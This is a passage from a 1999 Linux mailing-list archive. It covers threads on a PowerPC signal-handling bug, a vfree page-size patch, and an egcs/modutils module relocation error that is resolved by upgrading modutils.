any ( however I haven't fully investigated any possible problems
caused unblocking signals before sending them ). As sys_sigreturn is
getting called for every signal delivered, there is no benefit gained
by queueing them in the first place.

If you still aren't maintaining signal.c anymore could someone forward
on this bug report.

Also could you tell me a good place where I can find some info on the
rt_signal stuff & tell me if a fix gets/already is posted....






_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 59%]

* Re: I believe I found a bug in /arch/ppc/kernel/signal.c
  1999-02-22 14:36 59% I believe I found a bug in /arch/ppc/kernel/signal.c D.J. Barrow
@ 1999-02-22 18:53 64% ` Benjamin Herrenschmidt
  1999-02-23 14:35 64%   ` Lauro Whately
  0 siblings, 1 reply; 200+ results
From: Benjamin Herrenschmidt @ 1999-02-22 18:53 UTC (permalink / raw)
  To: D.J. Barrow, linuxppc-dev


On Mon, Feb 22, 1999, D.J. Barrow <barrow_dj@yahoo.com> wrote:

>The bug manifested itself in tftp, when longjmp'ing out
>of the signal handler on timeouts.
>
>Resulting in....
>a )sys_sigreturn not get called 
>b) signals queued & trampoline stuff on the user stack being trashed.
>c) SIGALRM being blocked forever.

Note also that the people doing ShapeShifter (Mac runtime) told they are
having problem with alternate signal stacks. I didn't look very in depth
at the code, it looks like it's here but I didn't tested. I don't have
more details about their exact problem but if someone is going to look at
the signal stuffs, then think about eventually testing the alt stack.

(I think they need this because parts of MacOS ROM code will use R1 for
something else than stack, I love Apple ;-)

-- 
           E-Mail: <mailto:bh40@calva.net>
BenH.      Web   : <http://calvaweb.calvacom.fr/bh40/>





[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: PATCH - bug in vfree
  1999-02-20 11:46 62% PATCH - bug in vfree Neil Booth
  1999-02-20 12:14 64% ` Neil Booth
@ 1999-02-22 20:31 64% ` Kanoj Sarcar
  1999-02-25  0:47 64% ` Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Kanoj Sarcar @ 1999-02-22 20:31 UTC (permalink / raw)
  To: Neil Booth; +Cc: linux-mm

On Feb 20,  8:46pm, Neil Booth wrote:
> Subject: PATCH - bug in vfree
>

>
> Quick description:- vfree forgets to subtract the extra cushion page
> from the size of each virtual memory area stored in vmlist when it calls
> vmfree_area_pages. This means that only the  vmalloc-requested size is
> allocated by vmalloc_area_pages, but the requested size PLUS the cushion
> page is freed by vmfree_area_pages.
>
> More deeply:- Close inspection of get_vm_area reveals that
> (intentionally?) it does NOT insist there be a cushion page behind a VMA
> that is placed in front of a previously-allocated VMA, it ONLY
> guarantees that a cushion page lies in front of newly-allocated VMAs.
> Thus two VMAs could be immediately adjacent without a cushion page, and
> coupled with the vfree bug means that vfree-ing the first VMA also frees
> the first page of the second VMA, with dire consequences.
>
> I have described this as clearly as I can, I hope it makes sense. Alan,
> this same bug also exists in 2.0.36.
>
> Neil.
>
> [ text/plain ] :
>
> --- linux/mm/vmalloc.c~	Sun Jan 24 19:21:06 1999
> +++ linux/mm/vmalloc.c	Sat Feb 20 20:17:11 1999
> @@ -187,7 +187,7 @@
>  	for (p = &vmlist ; (tmp = *p) ; p = &tmp->next) {
>  		if (tmp->addr == addr) {
>  			*p = tmp->next;
> -			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr),
tmp->size);
> +			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size
- PAGE_SIZE);
>  			kfree(tmp);
>  			return;
>  		}
>-- End of excerpt from Neil Booth


On Feb 20,  9:14pm, Neil Booth wrote:
> Subject: Re: PATCH - bug in vfree
> Neil Booth wrote:
>
> > More deeply:- Close inspection of get_vm_area reveals that
> > (intentionally?) it does NOT insist there be a cushion page behind a VMA
> > that is placed in front of a previously-allocated VMA, it ONLY
> > guarantees that a cushion page lies in front of newly-allocated VMAs.
>
> Sorry, this is not correct (mistook < for <=). The bug report is
> correct, though.
>
> Neil.


Given that we agree that there is always one page between vm_structs,
the extra page freeing (in vfree) is probably inconsequential, given
that vmfree_area_pages/free_area_pmd/free_area_pte basically ignores
null ptes. But yes, I agree it would be nice to get the "bug" fixed
in vfree().

Kanoj
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* RE: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-22 14:36 64% ` egcs-1.1.1-1c bug (was Re: major ksyms problem) Tom Vier
@ 1999-02-23  7:22 64%   ` Gary Thomas
  1999-02-23 12:24 64%     ` Tom Vier
  0 siblings, 1 reply; 200+ results
From: Gary Thomas @ 1999-02-23  7:22 UTC (permalink / raw)
  To: Tom Vier; +Cc: linuxppc-dev, mklinux-setup, mklinux-development-system



On 22-Feb-99 Tom Vier wrote:
> 
> it's an egcs bug. i think it's not aligning instructions properly, cuz
> i believe the 601 is more strict about alignment. is anyone having
> problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
> machine built under pre-R5 (egcs-1.1.1-1c)?
> 
> i rebuilt bsd_comp.o and ppp_deflate.o w/ egcs-1.0-2e from dr3 and
> they worked perfectly.
> 
> egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
> -mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
> it addes an offset table symbol that makes insmod complain.
> 
> is this a know problem?
> 
>> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
>> > Unhandled relocation of type 26 for .L343
> 

I think you need newer binutils to fix this.  Try using:
  ftp://ftp.linuxppc.org/linuxppc/users/gdt/redhat/RPMS/ppc/binutils-2.9.1-19a.ppc.rpm


------------------------------------------------------------------------
Gary Thomas                              |
email: gdt@linuxppc.org                  | "Fine wine is a necessity of
   ... opinions expressed here are mine  |        life for me"
       and no one else would claim them! |
                                         |      Thomas Jefferson
------------------------------------------------------------------------



[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* RE: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23  7:22 64%   ` Gary Thomas
@ 1999-02-23 12:24 64%     ` Tom Vier
  1999-02-23 20:53 64%       ` Tom Vier
  0 siblings, 1 reply; 200+ results
From: Tom Vier @ 1999-02-23 12:24 UTC (permalink / raw)
  To: Gary Thomas; +Cc: linuxppc-dev, mklinux-development-system


On Tue, 23 Feb 1999, Gary Thomas wrote:

> On 22-Feb-99 Tom Vier wrote:
> > it's an egcs bug. i think it's not aligning instructions properly, cuz
> > i believe the 601 is more strict about alignment. is anyone having
> > problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
> > machine built under pre-R5 (egcs-1.1.1-1c)?

> > egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
> > -mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
> > it addes an offset table symbol that makes insmod complain.
> > 
> > is this a know problem?

> I think you need newer binutils to fix this.  Try using:
>   ftp://ftp.linuxppc.org/linuxppc/users/gdt/redhat/RPMS/ppc/binutils-2.9.1-19a.ppc.rpm

no, it's an egcs bug, i believe. i'm already running
binutils-2.9.1.0.19a-1a from the current pre-R5. i'm download those
egcs rpms from your dir, right now, which fred bacon told me have
VTABLE_THUNKS disabled.

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/




[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: I believe I found a bug in /arch/ppc/kernel/signal.c
  1999-02-22 18:53 64% ` Benjamin Herrenschmidt
@ 1999-02-23 14:35 64%   ` Lauro Whately
  0 siblings, 0 replies; 200+ results
From: Lauro Whately @ 1999-02-23 14:35 UTC (permalink / raw)
  To: D.J. Barrow; +Cc: linuxppc-dev


> On Mon, Feb 22, 1999, D.J. Barrow <barrow_dj@yahoo.com> wrote:

> The bug manifested itself in tftp, when longjmp'ing out
> of the signal handler on timeouts.
>
> Resulting in....
> a )sys_sigreturn not get called
> b) signals queued & trampoline stuff on the user stack being trashed.
> c) SIGALRM being blocked forever.

Have you tried the sigsetjmp/siglongjmp ?
I've met a similar problem a month ago and found that POSIX.1 does not
specify the effect of setjmp and longjmp on signal masks (SVR4 does not save
and restore the signal mask under  setjmp/longjmp, however 4.3 BSD save and
restore the signal mask) Instead, two new functions sigsetjmp and siglongjmp
are defined by POSIX.1
Those new ones are working ok with linux 2.1.x releases (I've been using them
with linuxppc 2.1.112)
It seems that the behavior of sigsetjmp/siglongjmp was changed to the POSIX.1
specification around the release 2.1.112.

--
 Lauro Whately
 Parallel Computing Lab. / COPPE
 Federal University of Rio de Janeiro
 Brazil
 =====================================
 "A distributed system is one on which I cannot get any work done, because a
 machine I have never heard of has crashed." -- Leslie Lamport




[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
       [not found]     ` <Pine.LNX.4.05.9902220928100.405-100000@localhost.erols.com >
@ 1999-02-23 15:00 64%   ` Franz Sirl
  1999-02-23 21:06 64%     ` Tom Vier
  0 siblings, 1 reply; 200+ results
From: Franz Sirl @ 1999-02-23 15:00 UTC (permalink / raw)
  To: Tom Vier
  Cc: Tom Vier, mklinux-development-system, mklinux-setup, linuxppc-dev


At 15:36 22.02.99 , Tom Vier wrote:
>
>it's an egcs bug. i think it's not aligning instructions properly, cuz
>i believe the 601 is more strict about alignment. is anyone having
>problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
>machine built under pre-R5 (egcs-1.1.1-1c)?

What makes you think that it is an egcs bug? I have no problems on 601
(7200/75) with any of the modules you listed. Are you sure you have the
latest modutils (2.1.121 or later) installed?

>i rebuilt bsd_comp.o and ppp_deflate.o w/ egcs-1.0-2e from dr3 and
>they worked perfectly.
>
>egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
>-mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
>it addes an offset table symbol that makes insmod complain.
>
>is this a know problem?
>
>> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
>> > Unhandled relocation of type 26 for .L343

Is "Unhandled relocation of type 26" the behaviour for standard compilation
or for -fpic? You can't compile a kernel/modules with -fpic and expect
modutils still to work, modutils only handles the minimum necessary
relocation types.

Franz.


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* RE: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 12:24 64%     ` Tom Vier
@ 1999-02-23 20:53 64%       ` Tom Vier
  0 siblings, 0 replies; 200+ results
From: Tom Vier @ 1999-02-23 20:53 UTC (permalink / raw)
  To: Tom Vier; +Cc: Gary Thomas, linuxppc-dev, mklinux-development-system


On Tue, 23 Feb 1999, Tom Vier wrote:

> > I think you need newer binutils to fix this.  Try using:
> >   ftp://ftp.linuxppc.org/linuxppc/users/gdt/redhat/RPMS/ppc/binutils-2.9.1-19a.ppc.rpm
> 
> no, it's an egcs bug, i believe. i'm already running
> binutils-2.9.1.0.19a-1a from the current pre-R5. i'm download those
> egcs rpms from your dir, right now, which fred bacon told me have
> VTABLE_THUNKS disabled.

nevermind, i just heard VTABLE_THUNKS is c++ stuff. i'm trying the
latest pre-pre-R5 egcs ;)

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 15:00 64%   ` Franz Sirl
@ 1999-02-23 21:06 64%     ` Tom Vier
  1999-02-23 21:15 64%       ` Franz Sirl
  1999-02-24  7:14 64%       ` Michel Lanners
  0 siblings, 2 replies; 200+ results
From: Tom Vier @ 1999-02-23 21:06 UTC (permalink / raw)
  To: Franz Sirl; +Cc: Tom Vier, mklinux-development-system, linuxppc-dev


On Tue, 23 Feb 1999, Franz Sirl wrote:

> At 15:36 22.02.99 , Tom Vier wrote:
> >
> >it's an egcs bug. i think it's not aligning instructions properly, cuz
> >i believe the 601 is more strict about alignment. is anyone having
> >problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
> >machine built under pre-R5 (egcs-1.1.1-1c)?
> 
> What makes you think that it is an egcs bug? I have no problems on 601
> (7200/75) with any of the modules you listed. Are you sure you have the
> latest modutils (2.1.121 or later) installed?

it is an egcs bug. egcs-1.1.1-1c failss to build working bsd_comp.o,
ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
getting a newer build of egcs right now, to see if it's fixed.

> >i rebuilt bsd_comp.o and ppp_deflate.o w/ egcs-1.0-2e from dr3 and
> >they worked perfectly.
> >
> >egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
> >-mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
> >it addes an offset table symbol that makes insmod complain.
> >> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
> >> > Unhandled relocation of type 26 for .L343
> 
> Is "Unhandled relocation of type 26" the behaviour for standard compilation
> or for -fpic? You can't compile a kernel/modules with -fpic and expect
> modutils still to work, modutils only handles the minimum necessary
> relocation types.

the unhandled relocation was from egcs-1.1.1-1c using the standard
flags (no -fpic). i didn't expect it work w/ -fpic, but i thought it
might work better and it appears to, since it stopped insmod from
complaining about relocations and instead complain about the symbol
offset table (though it may just complain about the offset table
before finding the relocation problem, thus -fpic might not actually
make a difference).

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 21:06 64%     ` Tom Vier
@ 1999-02-23 21:15 64%       ` Franz Sirl
  1999-02-24  9:53 64%         ` Gary Thomas
  1999-02-24 18:40 64%         ` Tom Vier
  1999-02-24  7:14 64%       ` Michel Lanners
  1 sibling, 2 replies; 200+ results
From: Franz Sirl @ 1999-02-23 21:15 UTC (permalink / raw)
  To: Tom Vier, Tom Vier, Franz Sirl; +Cc: mklinux-development-system, linuxppc-dev


Am Tue, 23 Feb 1999 schrieb Tom Vier:
>On Tue, 23 Feb 1999, Franz Sirl wrote:
>
>> At 15:36 22.02.99 , Tom Vier wrote:
>> >
>> >it's an egcs bug. i think it's not aligning instructions properly, cuz
>> >i believe the 601 is more strict about alignment. is anyone having
>> >problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
>> >machine built under pre-R5 (egcs-1.1.1-1c)?
>> 
>> What makes you think that it is an egcs bug? I have no problems on 601
>> (7200/75) with any of the modules you listed. Are you sure you have the
>> latest modutils (2.1.121 or later) installed?
>
>it is an egcs bug. egcs-1.1.1-1c failss to build working bsd_comp.o,
>ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
>getting a newer build of egcs right now, to see if it's fixed.

What is the problem with these modules? Give a better description on what you
mean with "working"? They work perfectly for me with a self-compiled 2.2.1
kernel, and I compiled working modules with multiple kernel versions since the
egcs-1.1 alpha phase.
If your only problem is the "unhandled relocation type", install a newer
modutils package (>=2.1.121), that will fix it.

Franz.


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 21:06 64%     ` Tom Vier
  1999-02-23 21:15 64%       ` Franz Sirl
@ 1999-02-24  7:14 64%       ` Michel Lanners
  1 sibling, 0 replies; 200+ results
From: Michel Lanners @ 1999-02-24  7:14 UTC (permalink / raw)
  To: thomassr; +Cc: nester, Franz.Sirl, mklinux-development-system, linuxppc-dev


On  23 Feb, this message from Tom Vier echoed through cyberspace:
[snip]
>> >egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
>> >-mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
>> >it addes an offset table symbol that makes insmod complain.
>> >> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
>> >> > Unhandled relocation of type 26 for .L343
>> 
>> Is "Unhandled relocation of type 26" the behaviour for standard compilation
>> or for -fpic? You can't compile a kernel/modules with -fpic and expect
>> modutils still to work, modutils only handles the minimum necessary
>> relocation types.

Just to make sure we all talk about the same things, there was an issue
with relocation of kernel modules some time ago when we moved to a
newer version of egcs, which needed a newer version of modutils to be
able to handle that new relocation.

The modutils version to use is 2.1.121. If nowhere else, you can find a
binary on my site (see below).

Now, I may be completely off track, and this problem now is something
completely different ;-)

Michel

-------------------------------------------------------------------------
Michel Lanners                 |  " Read Philosophy.  Study Art.
23, Rue Paul Henkes            |    Ask Questions.  Make Mistakes.
L-1710 Luxembourg              |
email   mlan@cpu.lu            |
http://www.cpu.lu/~mlan        |                     Learn Always. "


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 21:15 64%       ` Franz Sirl
@ 1999-02-24  9:53 64%         ` Gary Thomas
  1999-02-24 16:06 64%           ` Franz Sirl
  1999-02-25  2:20 64%           ` Tom Vier
  1999-02-24 18:40 64%         ` Tom Vier
  1 sibling, 2 replies; 200+ results
From: Gary Thomas @ 1999-02-24  9:53 UTC (permalink / raw)
  To: Franz Sirl
  Cc: linuxppc-dev, linuxppc-dev, mklinux-development-system,
	Franz Sirl, Tom Vier, Tom Vier



On 23-Feb-99 Franz Sirl wrote:
> 
> Am Tue, 23 Feb 1999 schrieb Tom Vier:
>>On Tue, 23 Feb 1999, Franz Sirl wrote:
>>
>>> At 15:36 22.02.99 , Tom Vier wrote:
>>> >
>>> >it's an egcs bug. i think it's not aligning instructions properly, cuz
>>> >i believe the 601 is more strict about alignment. is anyone having
>>> >problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
>>> >machine built under pre-R5 (egcs-1.1.1-1c)?
>>> 
>>> What makes you think that it is an egcs bug? I have no problems on 601
>>> (7200/75) with any of the modules you listed. Are you sure you have the
>>> latest modutils (2.1.121 or later) installed?
>>
>>it is an egcs bug. egcs-1.1.1-1c failss to build working bsd_comp.o,
>>ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
>>getting a newer build of egcs right now, to see if it's fixed.
> 
> What is the problem with these modules? Give a better description on what you
> mean with "working"? They work perfectly for me with a self-compiled 2.2.1
> kernel, and I compiled working modules with multiple kernel versions since the
> egcs-1.1 alpha phase.
> If your only problem is the "unhandled relocation type", install a newer
> modutils package (>=2.1.121), that will fix it.
> 

Sadly he can't use that modutils package as it's only for 2.1.xx and 2.2.xx
kernels.

Tom,  Can you try the 2.2.xx kernels and see if they work for you?  This would
be a much better way to spend your time rather than looking after a quite old
kernel.

------------------------------------------------------------------------
Gary Thomas                              |
email: gdt@linuxppc.org                  | "Fine wine is a necessity of
   ... opinions expressed here are mine  |        life for me"
       and no one else would claim them! |
                                         |      Thomas Jefferson
------------------------------------------------------------------------



[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: I believe I found a bug in /arch/ppc/kernel/signal.c
@ 1999-02-24 12:45 64% D.J. Barrow
  0 siblings, 0 replies; 200+ results
From: D.J. Barrow @ 1999-02-24 12:45 UTC (permalink / raw)
  To: Lauro Whately; +Cc: linuxppc-dev


Thanks Lauro,

setjmp in glibc2 compiles to sigsetjmp(env,0) i.e. it doesn't save the
environment.

The sigsetjmp gets rid of the signal being blocked issue ( the main
symptom ), there still can be outstanding signals on the user stack
being trashed though.




---Lauro Whately <whately@cos.ufrj.br> wrote:
>
> > On Mon, Feb 22, 1999, D.J. Barrow <barrow_dj@yahoo.com> wrote:
> 
> > The bug manifested itself in tftp, when longjmp'ing out
> > of the signal handler on timeouts.
> >
> > Resulting in....
> > a )sys_sigreturn not get called
> > b) signals queued & trampoline stuff on the user stack being
trashed.
> > c) SIGALRM being blocked forever.
> 
> Have you tried the sigsetjmp/siglongjmp ?
> I've met a similar problem a month ago and found that POSIX.1 does not
> specify the effect of setjmp and longjmp on signal masks (SVR4 does
not save
> and restore the signal mask under  setjmp/longjmp, however 4.3 BSD
save and
> restore the signal mask) Instead, two new functions sigsetjmp and
siglongjmp
> are defined by POSIX.1
> Those new ones are working ok with linux 2.1.x releases (I've been
using them
> with linuxppc 2.1.112)
> It seems that the behavior of sigsetjmp/siglongjmp was changed to
the POSIX.1
> specification around the release 2.1.112.
> 
> --
>  Lauro Whately
>  Parallel Computing Lab. / COPPE
>  Federal University of Rio de Janeiro
>  Brazil
>  =====================================
>  "A distributed system is one on which I cannot get any work done,
because a
>  machine I have never heard of has crashed." -- Leslie Lamport
> 
> 
> 
> 

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-24  9:53 64%         ` Gary Thomas
@ 1999-02-24 16:06 64%           ` Franz Sirl
  1999-02-25  2:20 64%           ` Tom Vier
  1 sibling, 0 replies; 200+ results
From: Franz Sirl @ 1999-02-24 16:06 UTC (permalink / raw)
  To: Gary Thomas, Tom Vier; +Cc: linuxppc-dev


At 10:53 24.02.99 , Gary Thomas wrote:

>On 23-Feb-99 Franz Sirl wrote:
>>
>> Am Tue, 23 Feb 1999 schrieb Tom Vier:
>>>On Tue, 23 Feb 1999, Franz Sirl wrote:
>>>
>>>> At 15:36 22.02.99 , Tom Vier wrote:
>>>> >
>>>> >it's an egcs bug. i think it's not aligning instructions properly, cuz
>>>> >i believe the 601 is more strict about alignment. is anyone having
>>>> >problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
>>>> >machine built under pre-R5 (egcs-1.1.1-1c)?
>>>>
>>>> What makes you think that it is an egcs bug? I have no problems on 601
>>>> (7200/75) with any of the modules you listed. Are you sure you have the
>>>> latest modutils (2.1.121 or later) installed?
>>>
>>>it is an egcs bug. egcs-1.1.1-1c failss to build working bsd_comp.o,
>>>ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
>>>getting a newer build of egcs right now, to see if it's fixed.
>>
>> What is the problem with these modules? Give a better description on 
>> what you
>> mean with "working"? They work perfectly for me with a self-compiled 2.2.1
>> kernel, and I compiled working modules with multiple kernel versions 
>> since the
>> egcs-1.1 alpha phase.
>> If your only problem is the "unhandled relocation type", install a newer
>> modutils package (>=2.1.121), that will fix it.
>>
>
>Sadly he can't use that modutils package as it's only for 2.1.xx and 2.2.xx
>kernels.
>
>Tom,  Can you try the 2.2.xx kernels and see if they work for you?  This would
>be a much better way to spend your time rather than looking after a quite old
>kernel.

Or try to recompile the modutils (or modules package, as it was called 
before) he is using with the appended patch.

Franz.

Index: obj_ppc.c
===================================================================
RCS file: /cvsroot/modutils/obj/obj_ppc.c,v
retrieving revision 1.1
diff -u -r1.1 obj_ppc.c
--- obj_ppc.c   1997/09/10 22:20:03     1.1
+++ obj_ppc.c   1998/06/24 01:47:42
@@ -148,6 +148,11 @@
       *loc = (*loc & ~0x03fffffc) | (v & 0x03fffffc);
       break;

+    case R_PPC_REL32:
+      v -= dot;
+      *loc = v;
+      break;
+
     case R_PPC_ADDR32:
       *loc = v;
       break;


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 21:15 64%       ` Franz Sirl
  1999-02-24  9:53 64%         ` Gary Thomas
@ 1999-02-24 18:40 64%         ` Tom Vier
  1 sibling, 0 replies; 200+ results
From: Tom Vier @ 1999-02-24 18:40 UTC (permalink / raw)
  To: Franz Sirl; +Cc: Franz Sirl, mklinux-development-system, linuxppc-dev


On Tue, 23 Feb 1999, Franz Sirl wrote:

> >it is an egcs bug. egcs-1.1.1-1c failss to build working bsd_comp.o,
> >ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
> >getting a newer build of egcs right now, to see if it's fixed.
> 
> What is the problem with these modules? Give a better description on what you
> mean with "working"? They work perfectly for me with a self-compiled 2.2.1
> kernel, and I compiled working modules with multiple kernel versions
> since the 
> egcs-1.1 alpha phase.
> If your only problem is the "unhandled relocation type", install a newer
> modutils package (>=2.1.121), that will fix it.

yup, that fixed it. 8) i wonder what changed in egcs between 1.0 and
1.1.1 that makes the problem arise.

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: PATCH - bug in vfree
  1999-02-20 11:46 62% PATCH - bug in vfree Neil Booth
  1999-02-20 12:14 64% ` Neil Booth
  1999-02-22 20:31 64% ` Kanoj Sarcar
@ 1999-02-25  0:47 64% ` Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-02-25  0:47 UTC (permalink / raw)
  To: Neil Booth; +Cc: linux-mm

On Sat, 20 Feb 1999, Neil Booth wrote:

>I posted this bug on the kernel mailing list last year, but it never got
>fixed, probably as I didn't include a patch. I attach a patch this time

I included it one year ago in my tree and infact if you grab my
arca-patches you'll find it again ;).

>against kernel 2.2.1. The bug is rare, but can lead to kernel virtual
>memory corruption.

Hmm, when I checked it one year ago I didn't seen a way the bug could
corrupt memory.

>More deeply:- Close inspection of get_vm_area reveals that
>(intentionally?) it does NOT insist there be a cushion page behind a VMA
>that is placed in front of a previously-allocated VMA, it ONLY

Could you explain me better? I agree that there's no good reason trying to
free the gap-faulting page, but I don't see how there couldn't be a
page-gap between two vmalloced areas.

Andrea Arcangeli

--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-24  9:53 64%         ` Gary Thomas
  1999-02-24 16:06 64%           ` Franz Sirl
@ 1999-02-25  2:20 64%           ` Tom Vier
